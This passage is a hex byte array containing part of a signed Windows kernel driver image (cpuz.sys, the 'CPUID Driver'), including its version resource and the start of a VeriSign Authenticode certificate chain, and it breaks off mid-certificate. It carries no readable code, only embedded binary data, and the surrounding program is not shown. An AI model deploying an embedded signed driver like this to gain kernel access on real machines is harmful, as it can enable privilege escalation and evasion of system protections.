0x74, 0x61, 0x42, 0x79, 0x4F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x00, 0x50, 0x00, 0x4B, 0x65, 0x51, 0x75, 0x65, 0x72, 0x79, 0x50, 0x65, 0x72, 0x66, 0x6F, 0x72, 0x6D, 0x61, 0x6E, 0x63, 0x65, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x65, 0x72, 0x00, 0x48, 0x41, 0x4C, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x57, 0x06, 0x52, 0x74, 0x6C, 0x55, 0x6E, 0x77, 0x69, 0x6E, 0x64, 0x45, 0x78, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x09, 0x04, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x60, 0x90, 0x00, 0x00, 0xF0, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF0, 0x02, 0x34, 0x00, 0x00, 0x00, 0x56, 0x00, 0x53, 0x00, 0x5F, 0x00, 0x56, 0x00, 0x45, 0x00, 0x52, 0x00, 0x53, 0x00, 0x49, 0x00, 0x4F, 0x00, 0x4E, 0x00, 0x5F, 0x00, 0x49, 0x00, 0x4E, 0x00, 0x46, 0x00, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBD, 0x04, 0xEF, 0xFE, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x04, 0x00, 0x01, 0x00, 0x06, 0x00, 0x01, 0x40, 0xB0, 0x1D, 0x3F, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x04, 0x00, 0x04, 0x00, 0x03, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4E, 0x02, 0x00, 0x00, 0x01, 0x00, 0x53, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x66, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x2A, 0x02, 0x00, 0x00, 0x01, 0x00, 0x30, 0x00, 0x34, 0x00, 0x30, 0x00, 0x39, 0x00, 0x30, 0x00, 0x34, 0x00, 0x42, 0x00, 0x30, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x06, 0x00, 0x01, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x79, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x49, 0x00, 0x44, 0x00, 0x00, 0x00, 0x42, 0x00, 0x0D, 0x00, 0x01, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x44, 0x00, 0x65, 0x00, 0x73, 0x00, 0x63, 0x00, 0x72, 0x00, 0x69, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x49, 0x00, 0x44, 0x00, 0x20, 0x00, 0x44, 0x00, 0x72, 0x00, 0x69, 0x00, 0x76, 0x00, 0x65, 0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0x60, 0x00, 0x20, 0x00, 0x01, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x2E, 0x00, 0x37, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x36, 0x00, 0x33, 0x00, 0x38, 0x00, 0x35, 0x00, 0x20, 0x00, 0x62, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x74, 0x00, 0x20, 0x00, 0x62, 0x00, 0x79, 0x00, 0x3A, 0x00, 0x20, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x44, 0x00, 0x44, 0x00, 0x4B, 0x00, 0x00, 0x00, 0x32, 0x00, 0x09, 0x00, 0x01, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x00, 0x00, 0x63, 0x00, 0x70, 0x00, 0x75, 0x00, 0x7A, 0x00, 0x2E, 0x00, 0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x54, 0x00, 0x18, 0x00, 0x01, 0x00, 0x4C, 0x00, 0x65, 0x00, 0x67, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x70, 0x00, 0x79, 0x00, 0x72, 0x00, 0x69, 0x00, 0x67, 0x00, 0x68, 0x00, 0x74, 0x00, 0x00, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x70, 0x00, 0x79, 0x00, 0x72, 0x00, 0x69, 0x00, 0x67, 0x00, 0x68, 0x00, 0x74, 0x00, 0x28, 0x00, 0x43, 0x00, 0x29, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x31, 0x00, 0x36, 0x00, 0x20, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x49, 0x00, 0x44, 0x00, 0x00, 0x00, 0x3A, 0x00, 0x09, 0x00, 0x01, 0x00, 0x4F, 0x00, 0x72, 0x00, 0x69, 0x00, 0x67, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x00, 0x00, 0x63, 0x00, 0x70, 0x00, 0x75, 0x00, 0x7A, 0x00, 0x2E, 0x00, 0x73, 0x00, 0x79, 0x00, 0x73, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3C, 0x00, 0x0E, 0x00, 0x01, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x00, 0x50, 0x00, 0x55, 0x00, 0x49, 0x00, 0x44, 0x00, 0x20, 0x00, 0x73, 0x00, 0x65, 0x00, 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00, 0x00, 0x00, 0x42, 0x00, 0x0F, 0x00, 0x01, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x36, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x2E, 0x00, 0x37, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x36, 0x00, 0x33, 0x00, 0x38, 0x00, 0x35, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x01, 0x00, 0x56, 0x00, 0x61, 0x00, 0x72, 0x00, 0x46, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x66, 0x00, 0x6F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x04, 0x00, 0x00, 0x00, 0x54, 0x00, 0x72, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x04, 0xB0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x61, 0x00, 0x00, 0x00, 0x02, 0x02, 0x00, 0x30, 0x82, 0x61, 0x2F, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x02, 0xA0, 0x82, 0x61, 0x20, 0x30, 0x82, 0x61, 0x1C, 0x02, 0x01, 0x01, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x30, 0x4C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x04, 0xA0, 0x3E, 0x30, 0x3C, 0x30, 0x17, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0F, 0x30, 0x09, 0x03, 0x01, 0x00, 0xA0, 0x04, 0xA2, 0x02, 0x80, 0x00, 0x30, 0x21, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x04, 0x14, 0xB3, 0x8B, 0x98, 0x60, 0x8E, 0x41, 0x0C, 0x15, 0x55, 0xA7, 0xD7, 0x30, 0x56, 0xE8, 0x6E, 0x1D, 0xB8, 0x50, 0xBB, 0x2E, 0xA0, 0x82, 0x15, 0x0B, 0x30, 0x82, 0x04, 0xD0, 0x30, 0x82, 0x04, 0x39, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x25, 0x0C, 0xE8, 0xE0, 0x30, 0x61, 0x2E, 0x9F, 0x2B, 0x89, 0xF7, 0x05, 0x4D, 0x7C, 0xF8, 0xFD, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x30, 0x5F, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x37, 0x30, 0x35, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x2E, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x50, 0x75, 0x62, 0x6C, 0x69, 0x63, 0x20, 0x50, 0x72, 0x69, 0x6D, 0x61, 0x72, 0x79, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x30, 0x1E, 0x17, 0x0D, 0x30, 0x36, 0x31, 0x31, 0x30, 0x38, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x17, 0x0D, 0x32, 0x31, 0x31, 0x31, 0x30, 0x37, 0x32, 0x33, 0x35, 0x39, 0x35, 0x39, 0x5A, 0x30, 0x81, 0xCA, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x1F, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x16, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 0x4E, 0x65, 0x74, 0x77, 0x6F, 0x72, 0x6B, 0x31, 0x3A, 0x30, 0x38, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x31, 0x28, 0x63, 0x29, 0x20, 0x32, 0x30, 0x30, 0x36, 0x20, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x20, 0x2D, 0x20, 0x46, 0x6F, 0x72, 0x20, 0x61, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x7A, 0x65, 0x64, 0x20, 0x75, 0x73, 0x65, 0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x31, 0x45, 0x30, 0x43, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x3C, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x50, 0x75, 0x62, 0x6C, 0x69, 0x63, 0x20, 0x50, 0x72, 0x69, 0x6D, 0x61, 0x72, 0x79, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x20, 0x2D, 0x20, 0x47, 0x35, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xAF, 0x24, 0x08, 0x08, 0x29, 0x7A, 0x35, 0x9E, 0x60, 0x0C, 0xAA, 0xE7, 0x4B, 0x3B, 0x4E, 0xDC, 0x7C, 0xBC, 0x3C, 0x45, 0x1C, 0xBB, 0x2B, 0xE0, 0xFE, 0x29, 0x02, 0xF9, 0x57, 0x08, 0xA3, 0x64, 0x85, 0x15, 0x27, 0xF5, 0xF1, 0xAD, 0xC8, 0x31, 0x89, 0x5D, 0x22, 0xE8, 0x2A, 0xAA, 0xA6, 0x42, 0xB3, 0x8F, 0xF8, 0xB9, 0x55, 0xB7, 0xB1, 0xB7, 0x4B, 0xB3, 0xFE, 0x8F, 0x7E, 0x07, 0x57, 0xEC, 0xEF, 0x43, 0xDB, 0x66, 0x62, 0x15, 0x61, 0xCF, 0x60, 0x0D, 0xA4, 0xD8, 0xDE, 0xF8, 0xE0, 0xC3, 0x62, 0x08, 0x3D, 0x54, 0x13, 0xEB, 0x49, 0xCA, 0x59, 0x54, 0x85, 0x26, 0xE5, 0x2B, 0x8F, 0x1B, 0x9F, 0xEB, 0xF5, 0xA1, 0x91, 0xC2, 0x33, 0x49, 0xD8, 0x43, 0x63, 0x6A, 0x52, 0x4B, 0xD2, 0x8F, 0xE8, 0x70, 0x51, 0x4D, 0xD1, 0x89, 0x69, 0x7B, 0xC7, 0x70, 0xF6, 0xB3, 0xDC, 0x12, 0x74, 0xDB, 0x7B, 0x5D, 0x4B, 0x56, 0xD3, 0x96, 0xBF, 0x15, 0x77, 0xA1, 0xB0, 0xF4, 0xA2, 0x25, 0xF2, 0xAF, 0x1C, 0x92, 0x67, 0x18, 0xE5, 0xF4, 0x06, 0x04, 0xEF, 0x90, 0xB9, 0xE4, 0x00, 0xE4, 0xDD, 0x3A, 0xB5, 0x19, 0xFF, 0x02, 0xBA, 0xF4, 0x3C, 0xEE, 0xE0, 0x8B, 0xEB, 0x37, 0x8B, 0xEC, 0xF4, 0xD7, 0xAC, 0xF2, 0xF6, 0xF0, 0x3D, 0xAF, 0xDD, 0x75, 0x91, 0x33, 0x19, 0x1D, 0x1C, 0x40, 0xCB, 0x74, 0x24, 0x19, 0x21, 0x93, 0xD9, 0x14, 0xFE, 0xAC, 0x2A, 0x52, 0xC7, 0x8F, 0xD5, 0x04, 0x49, 0xE4, 0x8D, 0x63, 0x47, 0x88, 0x3C, 0x69, 0x83, 0xCB, 0xFE, 0x47, 0xBD, 0x2B, 0x7E, 0x4F, 0xC5, 0x95, 0xAE, 0x0E, 0x9D, 0xD4, 0xD1, 0x43, 0xC0, 0x67, 0x73, 0xE3, 0x14, 0x08, 0x7E, 0xE5, 0x3F, 0x9F, 0x73, 0xB8, 0x33, 0x0A, 0xCF, 0x5D, 0x3F, 0x34, 0x87, 0x96, 0x8A, 0xEE, 0x53, 0xE8, 0x25, 0x15, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0x9B, 0x30, 0x82, 0x01, 0x97, 0x30, 0x0F, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x05, 0x30, 0x03, 0x01, 0x01, 0xFF, 0x30, 0x31, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x2A, 0x30, 0x28, 0x30, 0x26, 0xA0, 0x24, 0xA0, 0x22, 0x86, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x63, 0x61, 0x33, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x01, 0x01, 0xFF, 0x04, 0x04, 0x03, 0x02, 0x01, 0x06, 0x30, 0x3D, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x36, 0x30, 0x34, 0x30, 0x32, 0x06, 0x04, 0x55, 0x1D, 0x20, 0x00, 0x30, 0x2A, 0x30, 0x28, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x1C, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x63, 0x70, 0x73, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0x7F, 0xD3, 0x65, 0xA7, 0xC2, 0xDD, 0xEC, 0xBB, 0xF0, 0x30, 0x09, 0xF3, 0x43, 0x39, 0xFA, 0x02, 0xAF, 0x33, 0x31, 0x33, 0x30, 0x6D, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x0C, 0x04, 0x61, 0x30, 0x5F, 0xA1, 0x5D, 0xA0, 0x5B, 0x30, 0x59, 0x30, 0x57, 0x30, 0x55, 0x16, 0x09, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x2F, 0x67, 0x69, 0x66, 0x30, 0x21, 0x30, 0x1F, 0x30, 0x07, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x04, 0x14, 0x8F, 0xE5, 0xD3, 0x1A, 0x86, 0xAC, 0x8D, 0x8E, 0x6B, 0xC3, 0xCF, 0x80, 0x6A, 0xD4, 0x48, 0x18, 0x2C, 0x7B, 0x19, 0x2E, 0x30, 0x25, 0x16, 0x23, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6C, 0x6F, 0x67, 0x6F, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x76, 0x73, 0x6C, 0x6F, 0x67, 0x6F, 0x2E, 0x67, 0x69, 0x66, 0x30, 0x34, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x28, 0x30, 0x26, 0x30, 0x24, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x18, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6F, 0x63, 0x73, 0x70, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x30, 0x3E, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x37, 0x30, 0x35, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x01, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x02, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x86, 0xF8, 0x42, 0x04, 0x01, 0x06, 0x0A, 0x60, 0x86, 0x48, 0x01, 0x86, 0xF8, 0x45, 0x01, 0x08, 0x01, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x03, 0x81, 0x81, 0x00, 0x13, 0x02, 0xDD, 0xF8, 0xE8, 0x86, 0x00, 0xF2, 0x5A, 0xF8, 0xF8, 0x20, 0x0C, 0x59, 0x88, 0x62, 0x07, 0xCE, 0xCE, 0xF7, 0x4E, 0xF9, 0xBB, 0x59, 0xA1, 0x98, 0xE5, 0xE1, 0x38, 0xDD, 0x4E, 0xBC, 0x66, 0x18, 0xD3, 0xAD, 0xEB, 0x18, 0xF2, 0x0D, 0xC9, 0x6D, 0x3E, 0x4A, 0x94, 0x20, 0xC3, 0x3C, 0xBA, 0xBD, 0x65, 0x54, 0xC6, 0xAF, 0x44, 0xB3, 0x10, 0xAD, 0x2C, 0x6B, 0x3E, 0xAB, 0xD7, 0x07, 0xB6, 0xB8, 0x81, 0x63, 0xC5, 0xF9, 0x5E, 